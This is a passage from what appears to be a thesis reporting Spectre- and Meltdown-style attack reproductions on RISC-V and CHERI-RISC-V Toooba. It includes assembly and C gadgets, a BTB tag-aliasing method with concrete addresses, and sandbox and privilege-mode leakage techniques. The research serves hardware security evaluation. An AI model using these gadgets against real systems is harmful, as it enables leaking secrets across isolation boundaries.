This section contains the Spectre-style attacks attempted on RISC-V Toooba in assembly and C. The results are depicted in Table 4.1. An entry marked with (✓) means that this attack was conducted successfully, (✗) means that I could not craft a successful attack. An entry marked with (-) indicates that I did not attempt an attack at all. All attacks could be reproduced successfully in RISC-V assembly. In order to prove the general applicability, the Spectre-PHT, Spectre-BTB, Spectre-RSB, and Spectre-STL-Load attacks have been reproduced in C as well.


                    asm   C
Spectre-PHT          ✓    ✓
Spectre-PHT-Write    ✓    -
Spectre-BTB          ✓    ✓
Spectre-RSB          ✓    ✓
Spectre-STL-Load     ✓    ✓
Spectre-STL-Jump     ✓    -

Table 4.1: Overview of attempted Spectre-style attacks on RISC-V Toooba and whether they were successful.

4.1.1 Spectre-PHT

The reproduction of Spectre-PHT in both RISC-V assembly and C was conducted as described in [22]. The important part of Spectre-PHT attacks is to train the branch direction predictor. The RISCY-OOO processor implements multiple branch direction predictors. Toooba uses a tournament predictor, which consists of one local and one global predictor. Both the local and the global predictor have their own Branch History Table (BHT). A two-bit selector determines which of these two predictors is used for the actual response of the tournament predictor. The goal of the attack is to train the prediction for the branch-greater-equal (bge) instruction such that it predicts not taken when the actual attack is conducted. To achieve that, attackers have two options. They can either train the global predictor to return not taken for that particular branch or they can train the local predictor to return not taken. The attacker has to keep in mind that it is important to train the selector accordingly as well. In Section 5.1.1, I explain thoroughly how I train the tournament predictor in order to achieve a successful attack. The principle of training remains the same over all Spectre-PHT attacks I conducted. In later stages of this work, I reviewed Toooba's branch direction prediction and made the following observation. When a specific branch is predicted for the first time by the tournament predictor, the predictor always uses the local branch prediction unit. Furthermore, the local branch predictor is initialised to predict False for the first prediction. Therefore, whenever Toooba encounters a branch for the first time, it will be predicted as False. For the Spectre-PHT attack as shown in Figure 5.1, this means that the branch prediction does the attacker-desired action by default. Therefore, an attacker does not need a training phase to conduct a successful attack, which I have confirmed in a

practical example of Spectre-PHT. This helps the attacker in two ways: first, the attack becomes easier as no previous training calls are needed, and second, the attacker saves time, which positively affects the bandwidth of a real-world attack.
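The C reproduction follows the well-known bounds-check gadget of Kocher et al. [22]; the following is a hedged sketch with hypothetical names, not the exact code used in this work.

    #include <stddef.h>
    #include <stdint.h>

    uint8_t secret_array[16];
    volatile uint8_t probe_array[256 * 64];   /* shared with the attacker */
    volatile size_t array_len = 16;           /* kept uncached so the branch resolves late */

    /* If idx is out of bounds but the bounds check is mispredicted, the two
     * dependent loads execute transiently and encode the secret byte in the
     * cache state of probe_array. */
    void victim(size_t idx)
    {
        if (idx < array_len) {
            uint8_t s = secret_array[idx];
            (void)probe_array[(size_t)s * 64];
        }
    }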

4.1.2 Spectre-PHT-Write

This variant of Spectre-PHT seeks to conduct a speculative write instead of a speculative load [34]. Out-of-bounds writes can be used to direct control flow to a gadget of interest for the attacker, e.g., by overwriting the return address residing on the software stack. Speculatively overwriting a return address can be the starting point of a Return-Oriented Programming (ROP) attack [48]. With code not using capabilities, I successfully crafted an attack that overwrites the return address such that the control flow is speculatively directed to a gadget revealing a register value.
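A hedged C sketch of such a write gadget is shown below (names hypothetical); the attacker arranges idx so that buf[idx] overlaps a saved return address.

    #include <stddef.h>
    #include <stdint.h>

    /* A mispredicted bounds check lets the store execute transiently out of
     * bounds, e.g. over a saved return address on the stack, so that the
     * following return is transiently redirected to an attacker gadget. */
    void victim_write(uint8_t *buf, volatile size_t len, size_t idx, uint8_t val)
    {
        if (idx < len)
            buf[idx] = val;
    }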

4.1.3 Spectre-BTB

Following Canella et al. [19], all Spectre-style attacks can be conducted in-place and out-of-place. However, throughout my thesis work, Spectre-BTB is the only attack where I attempted both attack types. In Figure 4.1, both the in-place and the out-of-place variant are depicted. On the left side, the two indirect jumps are mapped to the same BTB entry and therefore one jump can impact the prediction of the other jump. The exact explanation of why and how a BTB entry is aliased in Toooba is given in Section 5.1.3. On the right side of Figure 4.1, there is only one jump that trains the BTB. Depending on whether funct is called from call_0 or call_1, the jump will go to different targets. Therefore, previous calls to funct impact the branch target prediction of that jump. Both attacks reach the same goal, which is training a BTB entry. I reproduced both attacks with code similar to the one shown in Figure 4.1 and both attacks were successful. For the remainder of this thesis, I only use Spectre-BTB out-of-place as I believe it is more convenient for an attacker to directly poison the BTB instead of indirectly calling another function. Therefore, I will use the abbreviation Spectre-BTB for the out-of-place variant.

Left (out-of-place):

    ...
    800000c8: jr t1
    ...
    800202c8: jalr t1
    ...

Right (in-place):

    call_0:
        la a0, addr_0
        jal ra, funct
        ...
    call_1:
        la a0, addr_1
        jal ra, funct
        ...
    funct:
        jr a0

Figure 4.1: Left: Spectre-BTB out-of-place, right: Spectre-BTB in-place.

4.1.4 Spectre-RSB

The goal of Spectre-RSB attacks is to create a mismatch between hardware and software return addresses. In order to reproduce this attack, I created exemplary code which fetches its return address from memory and returns to this address. This does not match the address predicted by hardware and therefore allows an attacker to alter control flow in speculation. I conducted a similar attack for CHERI-RISC-V processors and, because of the redundancies, the attack is only thoroughly explained in Section 5.1.5. Another option to create a mismatch between the software and hardware return address stacks is to – if allowed by hardware – let the RSB overflow [23, 24]. In Toooba, the RSB has room for eight return addresses. If the call depth is greater than eight function calls, the subsequent return addresses will overwrite the ones already present. This can be used by an attacker to conduct a Spectre-RSB attack as well. I created an attack which causes a recursive function to call itself more than eight times. This fills all entries of the RSB with return addresses pointing to instructions in the code of the recursive function. The returns to the recursive function will be predicted correctly, but the jump returning to the calling function will be mispredicted and will execute parts of the recursive function one more time, which reads out-of-bounds values in my example.
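A hedged C sketch of the overflow variant is given below; the function names and the chosen depth are my own illustration.

    /* Recursing deeper than the eight-entry RSB overwrites the older
     * return-address predictions, so the final return back to the caller is
     * mispredicted into the body of recurse() and parts of it are
     * transiently re-executed. */
    static int recurse(int depth)
    {
        if (depth == 0)
            return 0;
        return 1 + recurse(depth - 1);   /* each call pushes onto the RSB */
    }

    int trigger(void)
    {
        return recurse(12);   /* call depth > 8 overflows Toooba's RSB */
    }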

4.1.5 Spectre-STL

Spectre-STL is based on memory disambiguation making wrong predictions. I successfully conducted the attack described in Figure 2.4. Again, the reproduction in CHERI-RISC-V assembly is similar and therefore the exact reasons will be described in Section 5.1.6. This attack will be referred to as Spectre-STL-Load.

               asm
Meltdown-US     ✗
Meltdown-GP     ✗

Table 4.2: Overview of attempted Meltdown-style attacks on RISC-V Toooba and whether they were successful.

Besides revealing a secret through two loads, the attacker can pursue another goal – jumping to an arbitrary target. This attack is referred to as Spectre-STL-Jump. It is based on the same principles as Spectre-STL-Load. However, the attack requires a preparation phase in which the attacker inserts a valid code address. This code address is stored at the address whose content is loaded twice due to wrong memory disambiguation. Therefore, the load that is predicted to be independent does not load a secret value, but a valid code address. If this code address is used in a jump before Toooba recognises that its memory disambiguation was wrong, the attacker will be able to jump to any arbitrary target.
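A hedged C sketch of the load variant is shown below (hypothetical names, simplified so that the aliasing pointers are passed in directly).

    #include <stdint.h>

    volatile uint8_t probe_array[256 * 64];   /* shared with the attacker */

    /* p and q alias the same location.  If memory disambiguation predicts
     * the load to be independent of the store, the load transiently returns
     * the stale (secret) value, which the dependent access then encodes in
     * the cache. */
    void victim_stl(uint64_t *p, uint64_t *q)
    {
        *p = 0;
        uint64_t stale = *q;
        (void)probe_array[(stale & 0xff) * 64];
    }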

4.2 Meltdown Attacks

In this section, I describe the Meltdown-style attacks attempted on RISC-V Toooba. The attacks and their respective outcomes are summarised in Table 4.2, which shows that none of the attempted attacks could be conducted successfully. However, these two attacks are an essential part of the test suite as their analysis shows how to prevent them. Furthermore, it is important to test new implementations to ensure that no conventional Meltdown-style attack is possible.

4.2.1 Meltdown-US

For Meltdown-US, I created a scenario resembling a running real operating system. In my setup, the operating system code runs in S privilege mode and has its own code and data page. The U(ser) bit is cleared for both S mode pages, which means that U mode code cannot access these pages. The attacker code runs in U privilege mode and also has its own code and data page. Similar to Meltdown-US-CHERI presented in Section 5.2.1, the attacker tries to access data without having sufficient permission – in Meltdown-US on the granularity of 4 KiB pages.

(Diagram: ExeMem stage – TLB-Req; FinishMem stage – Check, ReorderBuf. Not reproduced.)

Figure 4.2: The last two stages of the Toooba memory pipeline, which perform permission and capability checks.

The translation from virtual to physical addresses is conducted in the last stages of the memory pipeline in Toooba, as shown in Figure 4.2. The ExeMem stage sends the request to the Translation Lookaside Buffer (TLB) and the FinishMem stage receives the corresponding response. Besides the physical address, the access rights are available at this stage as well. Therefore, the exception – a page fault – will be set in the cause field of the Load-Store Queue (LSQ) entry of this memory access. This load will never be issued and thus Meltdown-US is not possible on Toooba.
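A hedged C sketch of the transient sequence attempted in this attack is shown below (names hypothetical); on Toooba the faulting load is never issued, so the dependent load never primes the cache.

    #include <stddef.h>
    #include <stdint.h>

    /* kernel_ptr points into an S-mode-only (U bit cleared) page; probe_array
     * is accessible to the U-mode attacker and probed with FLUSH+RELOAD
     * afterwards. */
    void meltdown_us_attempt(const volatile uint8_t *kernel_ptr,
                             volatile uint8_t *probe_array)
    {
        uint8_t secret = *kernel_ptr;              /* raises a page fault */
        (void)probe_array[(size_t)secret * 64];    /* would encode the secret */
    }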

4.2.2 Meltdown-GP

The Meltdown-GP attack seeks to read a register which the code has no permission to read. In my reproduction of the Meltdown-GP attack, user mode code attempts to read the CSR mcause, which is forbidden as it is a register only accessible by M mode code. The register access is followed by a load to an attacker-accessible array in order to make the secret visible. However, as marked in Table 4.2, the Meltdown-GP attack is not possible on Toooba. Checking which privilege mode is necessary is done as a part of the Rename stage in Toooba. If the necessary privilege mode is not present, the Rename stage will modify the respective Reorder Buffer (ROB) entry so that the cause field is set to the exception to be raised. Furthermore, the instruction is marked as executed in the entry, which means that it never enters the ALU pipeline. Therefore, the result will never be produced, which mitigates the attack as the following transient-instruction sequence cannot reveal the secret register value.

Chapter 5

CHERI-RISC-V Results

The main part of my thesis work was to extend my test framework to CHERI-RISC-V processors. This collection of attacks shows how to practically use the base framework presented in Chapter 4. In this chapter, I investigate whether CHERI mitigates transient-execution attacks and how effective CHERI is in doing so. To my knowledge, this work is the first to practically reproduce any transient-execution attack on a CHERI-RISC-V system. The attacks presented in this chapter extend the conventional attacks presented in Chapter 4. Furthermore, I will introduce a new transient-execution attack subclass that allows attackers to forge arbitrary and powerful capabilities in Toooba.

5.1 Spectre Attacks

As shown in Table 5.1, I successfully reproduced all four main Spectre attacks and several applications of them on CHERI-RISC-V systems. In this section, I do not describe every attack thoroughly as some of them have large similarities. In this thesis work, I carried out examples in C as well. As depicted in Table 5.1, these could be conducted successfully, but they will not be described in this section as they do not add significantly to the vulnerability profile of Toooba. However, an exemplary C attack is described in Appendix A.

                     CHERI asm   CHERI C
Spectre-PHT             ✓/✗        ✓/✗
Spectre-PHT-Write        ✗          -
Spectre-BTB              ✓          ✓
Spectre-RSB              ✓          ✓
Spectre-STL-Load         ✓          ✓
Spectre-STL-Jump         ✓          -
CHERI-Sandboxes          ✓          -
Priv-Mode-Regs           ✓          -
Priv-Mode-Exec           ✓          -

Table 5.1: Overview of attempted Spectre-style attacks in CHERI-RISC-V Toooba and whether they were successful. Spectre-PHT is classed as (✓/✗) as its success depends on the concrete capability configuration.

5.1.1 Spectre-PHT

The CHERI-assembly code of my reproduction of the Spectre-PHT attack is depicted in Figure 5.1. This is a close reproduction of the original work by Kocher et al. [22] that has been introduced in Section 2.2.1. The example checks whether an index (held in a0) is less than a global comparison variable

(stored at the address pointed to by ca2). If this is the case, an array holding secret values (with its base address held in ca1) will be accessed at index a0. The resulting value will be used as the index to another array (with its base address held in ca3). In this example, I assume that the memory addresses pointed to by ca3 are also visible to the attacker, e.g., a page shared between the victim and the attacker. Furthermore, I assume that ca1 allows access to more addresses than [ca1.baseaddr, ca1.baseaddr+length−1], where length is the global comparison value stored at the address pointed to by ca2. This can either be caused by capabilities not being configured suitably or by bounds not being exactly representable due to bounds compression, as is done with 128-bit capabilities [38]. In my example, I decided to train Toooba's tournament predictor to always choose the local predictor, which will then return not taken. In order to achieve that, I call the assembly code in Figure 5.1 eight times with values for a0 such that a0 ∈ [0, ..., 0x1f] holds. This will train the local BHT to return not taken for this particular branch and train the selector to always choose the local predictor for this branch. My choice for the other parameters remains the same over the training phase and is shown in Table 5.2. After the training phase, the attacker can start the actual attack. For the actual attack, I choose the index into the secret array to be 0x40 (a0 = 0x40). For all other parameters, I use the values presented in Table 5.2.

    // a0: index to secret array
    slli t1, a0, 3
    cincoffset ca1, ca1, t1   // ca1: secret array base addr.
    cld t0, 0(ca2)            // ca2: comparison value
    bge a0, t0, end
    cld t2, 0(ca1)            // access secret value
                              // use spec. execution
    cincoffset ca3, ca3, t2   // ca3: shared mem. page
    cld t2, 0(ca3)
end:
    // other code

Figure 5.1: Reproduction of the Spectre-PHT attack in CHERI assembly.

Capability Reg   Description
ca1              capability spanning [0x80001000, 0x80001fff]
ca2              capability spanning [0x80002000, 0x80002007],
                 8-byte value 0x20 at this address
ca3              capability spanning [0x80003000, 0x80003fff]

Table 5.2: Parameter configuration used for the Spectre-PHT attack.

As a preparation of the attack, I ensure that the load to the address stored in ca2 will miss all caches. This is important to the attacker as the outstanding load creates a dependency for the following branch instruction. Because of the previous training phase, the branch bge will be predicted as not taken. This means that from this point on the code following the branch instruction will be mispredicted and therefore executed transiently. Due to the outstanding load, the misprediction cannot be resolved for the entire miss penalty time of the load. The first speculative load following the mispredicted branch instruction will be a memory access to the address 0x80001200, returning the value 0x200 in my example. This value is added in the next instruction to ca3, which points to a memory region also accessible to the attacker. However, the first load was illegal because the code does not allow accesses to addresses 0x80001100 or greater. Later, Toooba will resolve this and roll back the speculatively executed instructions, but the second load to an attacker-accessible array has already been issued and can be detected by the attacker. This attack is classed as (✓/✗) as its success depends on the configuration

of the capability used for the first load. In both cases the code forbids the first memory access, but the capability configuration is different in these two instances of Spectre-PHT. If the capability is configured such that the memory access is out of capability bounds, the attack will not work. Otherwise, the attack will work. For the explanation of why the capability configuration mitigates the attack, see Section 5.2.1. The important factor in this attack is the miss penalty of the load through ca2. If this load, missing all caches, returns before the second load has been issued, the attack will not be successful because Toooba will detect the misprediction and not issue the second load, and thus the attacker cannot detect the timing difference through the cache later. In my simulation, it took the load 61 cycles from leaving the core until the value returned. The first speculative load is issued one cycle later and the second speculative load seven cycles after the first load. Therefore, Spectre-PHT works as 53 cycles are left. This means that an attacker can effectively use the spare cycles for executing other transient instructions that reveal more complex internal state, e.g. shifting and adding register values and then performing a load dependent on this data.

5.1.2 Spectre-PHT-CHERI-Write

When code is using capabilities in Toooba, this attack is successfully mitigated by CHERI. In my example, the attacker writes a double word to memory, which effectively clears the tag bit of the capability stored at this address as the stored data is not a capability itself. Therefore, when the load of the return address is conducted, this will lead to an invalid code capability being stored into the return address register. Toooba cannot jump to this capability and therefore this specific attack is successfully mitigated. Furthermore, a suitable capability configuration, which enforces tight bounds, mitigates this specific attack and variants of it in the first instance as described in Section 4.2.1.

5.1.3 Spectre-BTB on CHERI-Sandboxes

Sandboxes are designed to have strong memory protection against each other. One sandbox is not allowed to leak secrets to another sandbox. Inspired by Jonathan Woodruff and Jessica Clarke, I created an example that allows an adversary sandbox to leak information from another sandbox. Software compartmentalisation is one of the main goals of CHERI – this attack has specifically been designed to circumvent compartmentalisation and leak secrets of a victim sandbox. This example contains two sandboxes. One of them is an adversary sandbox, the other one is benign.

sand1_code:
    // load capability to jump to
    clc ct1, 16(ct6)
    // load pcc into cs7
    auipcc cs7, 0
    // this jump is aliased in the BTB
    cjr ct1

Figure 5.2: Code snippet of victim code in a sandbox which is under attack.

The benign sandbox is referred to as sand1, whereas the attacker sandbox is called attackbox. The code of sand1, which is the victim sandbox being attacked by attackbox, is depicted in Figure 5.2. The first instruction in the code of sand1 loads a capability from memory and the last instruction jumps to it. The second instruction, auipcc, adds the second operand – shifted by 12 bits to the left – to the current PCC. Since the second operand is zero in this example, auipcc writes the current PCC to cs7. This is a common way to produce capabilities for accessing data in CHERI-RISC-V and is regularly used by CHERI-LLVM.

Attacking Toooba's BTB

The goal of the attack is to trick Toooba into speculatively jumping from the benign sandbox sand1 into the attacker sandbox attackbox. Speculation for indirect jumps – these are jumps like cjr ct1 – is done with the help of the BTB. To fully understand the design of the attack, I need to explain Toooba's BTB and the hashing function I added. The BTB is an indexed array with 256 entries of the form depicted in Figure 5.3. An entry has three fields: one valid bit, an 8-bit tag, and the destination PCC target. When a jump is taken, a BTB entry will be updated. The index of this entry is determined by PCCj[8 ∶ 1], where PCCj is the PCC of the jump instruction. PCCj[X ∶ Y] denotes a selection of bits X down to Y from PCC, where index 0 is the Least Significant Bit (LSB) and index bitfield.length − 1 is the Most Significant Bit (MSB) of a bit field. The tag is calculated by splitting up the address of

PCCj into bytes and XOR-ing all eight bytes. The target PCC is the PCC to be executed in case the jump is taken. If a BTB entry is updated, its valid bit will be set. The valid bit of each entry is zero at start-up or if set so by hardware, e.g., if branch prediction state flushing is implemented as described in Section 2.3.2. When a branch prediction from the BTB is required, the index and the tag for that PCC are calculated, and only if the valid bit at that index is set and the calculated tag equals the tag stored at that index is this deemed a valid branch prediction and Toooba will speculate to the target PCC of this entry.

V (1 bit) | Tag (8 bits) | Target (129 bits)

Figure 5.3: Fields of an entry in Toooba's BTB.

The attacker wants to place an entry into the BTB so that the jump in Figure 5.2 speculatively leads to attacker-chosen code execution when the victim sandbox sand1 executes the next time. For this attack, I assume that the attacker can freely choose the address where their code is placed in the address space. In order to alias a BTB entry, an attacker needs to place a jump instruction at an address so that the following requirements are fulfilled, where

PCCb is the PCC of the jump in the victim sandbox, PCCa is the PCC of the jump in the attacker sandbox, addr() is the function that extracts the address of its argument PCC, and tag() is the function that calculates the tag by XOR-ing the bytes of the respective PCC:

PCCb[8 ∶ 1] = PCCa[8 ∶ 1] (5.1)

tag(addr(PCCb)) = tag(addr(PCCa)) (5.2)

Mapping the attacker jump instruction to the same index in the BTB is an easy task for an attacker. The more interesting task is to align the PCC of the attacker jump instruction so that its tag value equals the tag of the victim sandbox PCC. The sandbox to be attacked – sand1 – has a PCC with the start address 0x80020000 and the length 0x2000. The jump instruction cjr ct1 is at the PCC 0xffff200000018005_0000000080020244. This is the entire 128-bit code capability. As depicted in Figure 2.5, the upper 64 bits contain the otype, the permissions, and the compressed bounds, whereas the lower 64 bits contain the actual address. The address is important in this attack scenario and is therefore separated by an underscore character from the rest of the capability. I did not include the tag bit for capabilities in the description in this subsection. It is obvious that all capabilities need to have valid tag bits in order to be used for jumping and dereferencing memory. I chose the attacker sandbox attackbox to start at the address 0x80040000 and have a length of 0x20000. I decided to choose 0xffff20000001a001_0000000080040444 as the PCC for the jump. With that I wanted to demonstrate that it is possible

to conduct the attack in a single address-space operating system and that both victim and attacker sandbox do not need to have the same bounds:

PCCb = 0xffff200000018005_0000000080020244 (5.3)

PCCa = 0xffff20000001a001_0000000080040444 (5.4)

tag(addr(PCCb)) = tag(addr(PCCa)) = 0xc4 (5.5)

PCCb[8 ∶ 1] = PCCa[8 ∶ 1] = 0x22 (5.6)
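The aliasing conditions can be checked with a few lines of C; the helper names below are mine, and the code only reflects my reading of the hashing scheme described above.

    #include <stdint.h>
    #include <stdio.h>

    /* index = PCC[8:1] */
    static uint8_t btb_index(uint64_t addr) { return (uint8_t)((addr >> 1) & 0xff); }

    /* tag = XOR of the eight bytes of the 64-bit address */
    static uint8_t btb_tag(uint64_t addr)
    {
        uint8_t t = 0;
        for (int i = 0; i < 8; i++)
            t ^= (uint8_t)(addr >> (8 * i));
        return t;
    }

    int main(void)
    {
        uint64_t pcc_b = 0x0000000080020244ULL;   /* address of PCCb */
        uint64_t pcc_a = 0x0000000080040444ULL;   /* address of PCCa */
        printf("index: %#x %#x\n", btb_index(pcc_b), btb_index(pcc_a)); /* both 0x22 */
        printf("tag:   %#x %#x\n", btb_tag(pcc_b), btb_tag(pcc_a));     /* both 0xc4 */
        return 0;
    }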

Conducting the Attack

Now that we have understood how to alias an entry in the BTB, we have done the most important part of the attack. The next step an attacker needs to take is to actually place an entry at the respective index – this can be considered the training phase of the BTB. In order to achieve this, the attacker runs their code – including the jump at PCCa – which branches to an attacker-chosen target. This target is the gadget the victim sandbox will speculatively jump to during the actual attack. Suitable targets are explained in the following paragraphs. The second training step is to ensure that the first instruction in Figure 5.2 misses all caches, in order to misspeculate for as long as possible. If this were not the case, Toooba would quickly load the correct PCC to jump to and correct its misspeculation before the transient-execution sequence in the target gadget could take effect. After this training phase, the attacker triggers or awaits the next execution of sand1. The load will miss all caches and Toooba will speculatively jump to the attacker's gadget with the entire register state of sand1 being present. The attacker can use the register state from sand1 in multiple ways to achieve different goals of their attack. First, the attacker can leak one or more secret values stored in a register. This can be the case if sand1 computes on secret data, e.g., an encryption key. In order to reveal the secret, the attacker performs a load to an attacker-accessible array indexed by the secret. Second, the register state can give the attacker access to a memory location of interest, e.g., because only sand1 has a capability to this memory location. The attacker loads the value of interest and conducts a second load to an attacker-accessible array indexed by that value in order to reveal it. Furthermore, it is possible to load other capabilities through capabilities being present in the current register state of the victim. In my example of the attack, I sought to use the second method. The load missing all caches needs 88 cycles from being issued to memory until returning to the core. The first speculative memory

access in the gadget, fetching the secret into the core, is issued with 20 cycles left and the revealing load with 12 cycles left, which explains why the attack is successful. This sandbox attack includes the basic Spectre-BTB attack as demonstrated in [22]. The pure Spectre-BTB attack has also been reproduced in this thesis work, but will not be shown since its mechanism is included in this attack. Furthermore, I produced other Spectre-BTB attacks, e.g., attacking direct jumps and similar attacks. However, these were either not successful or could not contribute to attacking Toooba in a way not already explained. Therefore, I do not explain these attacks in this text.

5.1.4 Priv-Mode Attacks

The sandbox attacks bring up the question of whether it is possible to speculate across different privilege modes in RISC-V. I constructed two attacks proving the hypothesis that it is possible, which are referred to as Priv-Mode-Regs and Priv-Mode-Exec in Table 5.1. For both attacks, the scenario is that privileged code, e.g., kernel code, is being executed in S privilege mode, whereas the attacker code resides in U privilege mode. The goal of both attacks is to speculatively jump to a gadget chosen by the attacker. This scenario can be found in real-world attacks as well, since operating systems usually run in S privilege mode in RISC-V [12]. A real-world attack for this scenario is further explained in Section 6.1.4. Neither of the priv-mode attacks is possible if the Supervisor User Memory (SUM) bit is cleared in sstatus. This mechanism prevents code running in S mode from accessing pages that are accessible by U mode code1. The SUM mechanism and related principles are thoroughly explained in the privileged specification [12].

Priv-Mode-Regs

This attack is close to the sandbox attack presented in Section 5.1.3. The goal of this attack is to speculatively jump from S privilege mode to U privilege mode in order to use the register state set up by the S mode code. The two main parts of the attack are again aliasing an entry in the BTB and delaying a load such that a jump depending on that load will speculatively lead to the execution of the attacker's chosen gadget residing in U mode. As in the sandbox attack, the goal of the attacker is to make use of the register state of the S mode code by either leaking a value from or through the register state.

1Code pages accessible by U privilege mode code have the U(ser) bit set in the respective PTE.

I constructed an attack that manages to leak a value through a powerful capability of the kernel being present in the current register state. Other particularly interesting targets are the Special Capability Registers (SCRs), as they are expected to hold powerful capabilities.

Priv-Mode-Exec

The difference between this attack and the Priv-Mode-Regs attack is that the attacker-chosen gadget makes use of the fact that the processor continues to execute in S privilege mode in speculation. This means that the attacker has permission to access CSRs. In my example, the gadget accesses sscratch – which has been previously written to by the kernel – and then performs a load to an attacker-accessible array indexed by the value in sscratch. This attack requires the PCC in U privilege mode to have its Access System Registers (ASR) permission set, as ASR restricts access to both CSRs and SCRs. RISC-V constrains the access to CSRs by privilege modes, but CHERI-RISC-V adds the ASR functionality on top. ASR restricts access to all CSRs except seven white-listed ones, among which sscratch is not included [37]. This attack demonstrates how to make use of the register values accessible to the code the speculative jump came from. For this attack, it is important to understand that the privilege mode a RISC-V microprocessor currently operates in is internal state and can only be changed by traps and their respective return operations. Furthermore, this means that code can be executed in every privilege mode as long as it does not contain privilege-mode-specific instructions, as for example mret, which can only be used in M privilege mode. An mret instruction executed in S or U privilege mode will lead to an exception being raised. In my example the revealing gadget is executed in both S and U privilege mode.
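A hedged C sketch of such a revealing gadget is shown below (names hypothetical); it only has an effect while the core still speculatively operates in S mode, since the CSR read would otherwise trap.

    #include <stdint.h>

    /* Read the privileged sscratch CSR and encode its low byte in the cache
     * state of an attacker-accessible probe array. */
    static inline void reveal_sscratch(volatile uint8_t *probe_array)
    {
        uint64_t v;
        asm volatile("csrr %0, sscratch" : "=r"(v));
        (void)probe_array[(v & 0xff) * 64];
    }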

5.1.5 Spectre-RSB

Similar to the BTB, the RSB can contain powerful capabilities that can be of use for an attacker. The code depicted in Figure 5.4 shows an example of privileged code that is called from user space. First, the code loads a new address into the return address register cra. Next, the code loads its PCC into a register, adds an offset to the capability address, and stores a secret value to this memory location. Finally, the code returns to the address previously loaded into cra. However, Toooba will predict the return address and use the top entry of the RSB for the prediction. This entry is a capability pointing to the next instruction of the calling function. The RSB contains this entry because the call to the privileged function caused the hardware to push it there. Therefore, Toooba will speculatively jump to unprivileged code with the register state of the privileged code. In fact, Toooba will always speculatively jump to the next instruction of the calling code in the example depicted in Figure 5.4. Later, Toooba will jump to the actual PCC when it realises its misspeculation.

kernel_funct:
    // load new return address
    clc cra, 0(cs2)
    // load kernel pcc into ct6
    auipcc ct6, 0
    li t1, 0x200
    cincoffset ct6, ct6, t1
    li t1, 0x400
    // store secret
    csd t1, 0(ct6)
    // return
    cret

Figure 5.4: Privileged code whose return address will be mispredicted in the Spectre-RSB attack.

Spectre-RSB gives the attacker the same possibilities to make use of the register state of the privileged code as Spectre-BTB does. I created an example that uses a powerful capability in the speculative register state in order to pull a secret into the core and make it visible to the attacker via a second load. What this attack needs is a mismatch between the software return address and the address stored in the RSB. In my example, this is achieved by loading another address into cra. For the attack to work, I made this load miss all caches. This gives the attacker the biggest possible time window to transiently perform other loads that make the secret visible. As described in Section 4.1.4, overflowing the RSB can also create a mismatch between hardware and software return addresses. I successfully conducted this attack type in CHERI-RISC-V assembly as well. Note that this only works if the capabilities allow these memory accesses, following previous explanations.

    clc ca1, 0(cs1)
    // ca1 and cs2 hold the same capability
    csd a4, 0(ca1)
    // memory disambiguation will lead to
    // this being executed with stale data
    cld a2, 0(cs2)
    cincoffset cs3, cs3, a2
    cld a3, 0(cs3)

Figure 5.5: Reproduction of the Spectre-STL attack in CHERI-RISC-V assembly.

5.1.6 Spectre-STL

Spectre-STL-Load and Spectre-STL-Jump both rely on the fact that memory disambiguation predicts a store-load pair to be independent although they access the same memory address. As shown in Table 5.1, both Spectre-STL variants work in CHERI-RISC-V Toooba.

Spectre-STL-Load

The code depicted in Figure 5.5 shows the sequence of instructions building the actual attack. The first instruction loads the capability at the address pointed to by cs1 into ca1. I constructed the attack such that cs2 is stored at this memory address. In my example, ca1 and cs2 are identical capabilities, but in order for the attack to be successful they only need to point to the same memory address. The following store and load instructions are executed out-of-order under the assumption that they are not dependent, since they use different capability registers for their memory accesses. However, this is not the case, as both the store and the load go to the same memory address. The load will be executed earlier than the store and therefore it does not return the data of the store, but the previous content stored at this memory address. The transient-instruction sequence following the load of the stale data will reveal the secret data. Issuing a load, indexed by the secret, to an attacker-accessible array with its base address stored in cs3 makes the secret visible to the attacker. Toooba's memory disambiguation and out-of-order execution enable this attack. When a memory instruction reaches the Rename stage, one instruction per cycle is enqueued to the reservation station of the memory pipeline, from which the memory pipeline pulls its instructions.

The memory pipeline will execute the instructions as soon as all source register values are available. Toooba does not have a dedicated unit for disambiguating memory accesses – it assumes that memory accesses through different registers are not dependent. In case they are, Toooba will perform a rollback and re-execute the affected instructions. In my example, the first load introduces a delay for the second instruction as they overlap in architectural register use. The second instruction cannot proceed in the memory pipeline. However, the third instruction can proceed in the memory pipeline and produce its result as it does not overlap in architectural register use. This leads to the transient-instruction sequence being executed with stale memory data.

Spectre-STL-Jump

The setup for this attack is similar to the attack on RISC-V Toooba presented in Section 4.1.5, with the difference that capabilities are used instead of integer pointers. The fact that the stale value being loaded is not data, but a valid code capability, does not change the feasibility of this attack. The code capability is valid and therefore Toooba takes the indirect branch to this capability's address. Analogously to Spectre-STL-Load, the memory accesses are not out-of-bounds and hence CHERI does not prevent this sequence of speculative instructions. The attack works because Toooba generally assumes memory operations not to be dependent, as described above.

5.2 Meltdown Attacks

Table 5.3 shows an overview of the Meltdown attacks attempted on CHERI-RISC-V Toooba during this thesis work and whether they were successful. Analogous to the presentation of the Spectre attacks, some attacks show large similarities and therefore the common attacking techniques are explained only once.

5.2.1 Meltdown-US-CHERI

Meltdown-US-CHERI is an adaptation of Meltdown-US. Instead of attempting to read from a page which the attacker does not have sufficient rights to access, I attempted to read from a memory address through a capability, out of its bounds. This attack is especially tailored to CHERI – the results of the reproduction of the original Meltdown-US attack are presented in Section 4.2.1.

                     CHERI asm
Meltdown-US-CHERI        ✗
Meltdown-GP-CHERI        ✗
CBuildCap-Load           ✓
CSetBounds-Load          ✓
CInvoke-Load             ✓
CUnseal-Load             ✓

Table 5.3: Overview of attempted Meltdown-style attacks on CHERI-RISC-V Toooba and whether they were successful.

The code for the attack is shown in Figure 5.6. The attack consists of three basic parts. First, the attacker increases the offset to a desired address out of capability bounds. The reader has to note that in CHERI, setting the address out of bounds is not an illegal operation itself, but the memory access is. This memory access, done with the second instruction, is the next part of the attack. It loads the desired secret into the register t2. The following two instructions are the final part of the attack and reveal the secret by a load to an attacker-accessible array with its base address in ct1. However, this attack could not be conducted successfully on CHERI-RISC-V Toooba. Its memory pipeline consists of multiple stages that dispatch the instruction, read the register values, calculate the virtual address, translate the virtual address to the physical address, and finally enqueue the memory access into the LSQ. The last two pipeline stages are depicted in Figure 4.2. In the last pipeline stage, Toooba performs the capability bounds checks and sets the exception cause field in the corresponding LSQ entry in case an exception is detected. Toooba only issues valid requests – without the cause field set – to memory. Therefore, the out-of-bounds load will never be issued, which effectively mitigates the entire attack. No revealing transient-execution sequence is possible because the necessary result never becomes available.

melt_us_cheri:
    // set ct0 offset out of bounds
    cincoffsetimm ct0, ct0, 512
    // perform load out of capability bounds
